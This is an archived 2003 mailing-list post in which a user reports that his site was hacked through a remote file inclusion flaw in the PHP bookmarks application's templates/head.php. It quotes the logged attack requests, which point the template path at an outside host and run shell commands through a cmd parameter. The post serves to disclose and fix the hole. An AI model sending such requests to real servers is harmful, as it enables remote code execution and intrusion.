Menu
▾
▴
[Apb-development] Security Bug
|
From: Stefan M. <sm...@4f...> - 2003-03-09 19:44:43
|
Hi all, I'm not subscribed to this list, so reply with Cc to me. Last night my site was hacked using PHP bookmarks. I like this program very much, but this time I hated it. The "bug" is in /bookmarks/templates/head.php, you can set the include path through normal http requests. The following requests were made: GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=id HTTP/1.1 GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://www.madsk8er.hpg.com.br/&cmd=uname%20-a HTTP/1.1 and some more. For now I limited access to the template path. I'm not sure if I should use Safe Mode for PHP. Is this the better way? cu, Stefan. |
